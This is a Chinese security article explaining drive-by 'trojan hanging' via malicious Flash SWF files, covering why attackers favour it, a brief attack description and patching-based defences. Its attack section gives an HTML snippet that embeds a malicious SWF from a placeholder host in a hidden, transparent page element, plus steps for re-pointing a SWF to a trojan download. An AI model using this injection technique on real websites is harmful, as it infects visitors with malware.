利用Flash软件漏洞的SWF挂马方式剖析与防范

SWF挂马出现得比较早，以前主要是利用系统漏洞传播，这种方式跟很多挂马方式相差无几，所以并不出众。直到利用Flash软件漏洞的SWF挂马方式出现后，才迅速蹿红，成为主流的挂马方式之一。为什么利用Flash软件漏洞的SWF挂马方式会这么厉害呢?下文将一一解答。

金山李铁军：资深安全工程师，有十余年反病毒经历。
　　SWF挂马的危害性很大，为什么这么说呢?它有两个优势：第一个优势是，使用SWF文件格式的Flash有着庞大的安装量，用户基数大，潜在的可能被黑的用户量就大。每当Flash新漏洞一出现，SWF挂马就会沉渣泛起。
　　第二个优势就是，播放SWF文件是很正常的行为，不会引起用户的警觉，这样挂马的隐蔽性就会非常高。当然，这种挂马方式的缺点也非常明显，在大多数用户安装了补丁后，成功率就会大大降低。
 

安全百科：SWF是Adobe Flash在网络中播放时使用的文件格式，也是动画制作完成后生成的最终格式。Flash的普及程度相当高，绝大部分的网友为了浏览SWF文件而安装它。

揭示SWF挂马优势

为什么黑客会钟情SWF挂马呢?因为SWF文件对应的Flash动画播放软件是装机必备的标准软件之一，如果能够挖掘到Flash中的漏洞，再配合网页进行挂马，自然会肉鸡成群。此外，许多人会定期更新Windows的补丁，但是常用软件却很少进行更新，这就造成了Flash这样的漏洞受到黑客的追捧与欢迎。

黑客选择使用Flash的SWF文件挂马，就如同以前的毒奶粉事件一样，虽然消费者都很信任正规厂商的奶粉，避免通过其他渠道购买奶粉。但是真奶粉由于自己的质检漏洞等问题，导致了奶粉中含有有毒成分，最终毒害了消费者。

Flash动画也是如此，很多用户相信Flash，都会进行安装，但是由于Flash播放控件也存在漏洞，导致用户虽然安装了无毒的Flash控件，但是一样会遇到利用Flash控件漏洞挂马的网页。

安全八卦：Flash漏洞曝光后，虽然补丁程序及时发布了，但是仍然有数百万台没有及时更新安全补丁的电脑被植入木马。此外，一些恶意网站也趁火打劫，不管访问者是否更新了安全补丁，都要求更新网站提供的所谓的安全补丁，其实是病毒。

SWF挂马攻防实录

攻主流的SWF挂马都是通过Flash漏洞实现的。黑客下载一个恶意的SWF文件，用写字板打开，找到EXE文件链接的地址。黑客只需要将该链接地址修改成自己指定的木马下载地址，再上传到网站即可。

在需要挂马的网页中插入：

<DIV style="POSITION: absolute;left: 00px">
　　<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6，0，29，0" width="700" height="500">
　　<param name="movie" value="http://www.xxx.com/MuMa.swf SWF木马网址">
　　<param name="wmode" value="transparent">
　　<embed src=" http://www.xxx.com/MuMa.swf SWF木马网址" type="application/x-shockwave-flash">
　　</embed>
　　</object>
　　</DIV>

此外，黑客还可以使用SWF木马生成器来挂马。在生成器中输入自己指定的木马下载地址，然后点击“生成”按钮，将生成恶意的SWF文件插入需要挂马的网页中。

防安全工程师在处理SWF挂马时，首先升级Flash的版本，打上相关的安全补丁，堵住安全漏洞，并会使用一些监控工具，监控公司客户机常用软件的升级情况。此外，还可以使用一些能拦截网页挂马的安全辅助工具等。

安全八卦：由于Flash漏洞的危害性，当漏洞利用程序出现时，在黑客圈甚至被炒到数万元，但仍不乏购买者。与此同时，Flash漏洞的曝光，也让黑客圈内的肉鸡交易再次火爆，在黑客常用的IRC聊天频道中，肉鸡以数千甚至上万的数量进行批量交易。